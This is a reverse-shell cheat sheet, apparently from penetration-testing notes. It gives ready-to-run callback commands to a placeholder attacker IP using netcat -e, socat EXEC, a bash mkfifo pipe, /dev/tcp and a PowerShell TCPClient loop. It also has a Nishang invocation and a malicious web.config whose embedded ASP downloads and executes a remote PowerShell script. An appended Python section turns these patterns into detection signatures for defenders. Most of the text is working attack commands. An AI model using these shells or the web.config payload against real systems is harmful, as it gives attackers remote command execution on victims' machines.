Reverse Shell
In a reverse shell, the target machine initiates the connection back to the attacker's machine.
Netcat
On the attacker computer, first start a listener as follows:
attacker> $ nc -nvlp 443
On the victim shell, connect back to the attacker's IP on the same port the listener is bound to (443 here):
victim> $ nc -nv <attacker.IP> 443 -e /bin/bash
Socat
On the attacker machine, run socat:
attacker> $ socat -d -d TCP4-LISTEN:4444 STDOUT
Then, on the victim shell, connect back to the attacker's IP:
victim> $ socat TCP4:<attacker.IP>:4444 EXEC:/bin/bash
Bash
As before, start a listener on the attacker computer.
attacker> $ nc -nvlp 443
Then, run the following bash instructions on the victim machine.
victim> $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker IP> 443 >/tmp/f
From a simple web shell, the following command can be useful:
bash -c 'bash -i >& /dev/tcp/<attacker IP>/443 0>&1'
PowerShell
On the attacker machine, open a netcat listener:
attacker> $ nc -lnvp 443
Next, send a PowerShell reverse shell from the victim's computer:
C:\Users\victim> $client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);
>> $stream = $client.GetStream();
>> [byte[]]$bytes = 0..65535|%{0};
>> while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
>> {
>>     $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
>>     $sendback = (iex $data 2>&1 | Out-String );
>>     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
>>     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
>>     $stream.Write($sendbyte,0,$sendbyte.Length);
>>     $stream.Flush();
>> }
>> $client.Close();
The above commands can also be run as a one-liner from a command prompt:
C:\Users\victim> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Nishang
First, grab a copy of Nishang's Invoke-PowerShellTcp.ps1. Then, add the line below at the end of the script so that it automatically invokes the callback:
Invoke-PowerShellTcp -Reverse -IPAddress <AttackerIp> -Port 443
Upload this file to the victim computer and execute it. Remember to start a listener on the attacker machine first.
Web.config
This method can be very destructive: if the application already uses a web.config file, that file is replaced with ours, which may lack required settings such as the database connection string or valid assembly references. It is recommended not to use this technique on live websites whose application may depend on the web.config being replaced. IIS applications nested inside other applications, or virtual directories, often do not use their own web.config file and are generally safer candidates than a website's root directory.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://<AttackerIP>/Invoke-PowerShellTcp.ps1')") %>
Note that the above content downloads Nishang's PowerShell script from the attacker server and immediately executes it on the victim machine. A web server and a listener matching the port specified in the Nishang script must therefore be started beforehand (see the previous section for the script configuration). The two can be started as follows:
attacker> $ python -m http.server 80
attacker> $ nc -nvlp 443
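From the defensive side, every variant on this page leaves a recognisable process command line. The following Python, an added example that is not part of the original page, turns those patterns into signatures and runs them over constructed process-creation records (the 10.0.0.5 address and all sample lines are made up), flagging the shells while leaving ordinary netcat, socat and Python usage alone.

```python
import re
from typing import List, Optional, Tuple

# Signatures derived from the reverse-shell variants listed on this page.
# Order matters: the first matching signature is reported. Patterns are
# case-insensitive because PowerShell and cmd.exe are not case-sensitive.
SIGNATURES = [
    ("netcat -e shell", re.compile(r"\bn(c|cat|etcat)\b.*\s-e\s*/bin/(ba)?sh\b", re.I)),
    ("socat EXEC shell", re.compile(r"\bsocat\b.*\bTCP4?:\S+.*\bEXEC:", re.I)),
    ("mkfifo/nc pipe shell", re.compile(r"\bmkfifo\b.*\|\s*n(c|cat|etcat)\b", re.I)),
    ("bash /dev/tcp shell", re.compile(r"/dev/tcp/[\w.\-]+/\d+", re.I)),
    ("PowerShell TCPClient shell", re.compile(r"Net\.Sockets\.TCPClient\(.*GetStream\(\).*\biex\b", re.I | re.S)),
    ("download-and-iex stager", re.compile(r"\biex\b.*downloadstring\(", re.I)),
    ("Nishang Invoke-PowerShellTcp", re.compile(r"Invoke-PowerShellTcp\b", re.I)),
]

def classify(cmdline: str) -> Optional[str]:
    """Return the technique label for a suspicious command line, else None."""
    for label, pattern in SIGNATURES:
        if pattern.search(cmdline):
            return label
    return None

def scan(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (label, command line) for every record that matches a signature."""
    labelled = [(classify(line), line) for line in cmdlines]
    return [(label, line) for label, line in labelled if label]

# Constructed sample process command lines (hypothetical telemetry; 10.0.0.5 is
# made up), mixing the page's variants with benign netcat/socat/python usage.
SAMPLE_CMDLINES = [
    "nc -nv 10.0.0.5 443 -e /bin/bash",
    "socat TCP4:10.0.0.5:4444 EXEC:/bin/bash",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 443 >/tmp/f",
    "bash -c 'bash -i >& /dev/tcp/10.0.0.5/443 0>&1'",
    "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\"",
    "powershell -ExecutionPolicy Bypass -File C:\\Users\\victim\\Invoke-PowerShellTcp.ps1",
    "cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.0.0.5/x.ps1')",
    "nc -zv db.internal 5432",              # benign port check
    "socat -d -d TCP4-LISTEN:4444 STDOUT",  # plain listener, no EXEC
    "python -m http.server 80",             # plain file server
]

if __name__ == "__main__":
    for label, line in scan(SAMPLE_CMDLINES):
        print(f"[{label}] {line}")
```

Substring signatures like these are a starting point for an EDR or auditd rule, not a complete detection: they miss obfuscated or encoded command lines, so pair them with network-level indicators such as a shell process owning an outbound TCP socket.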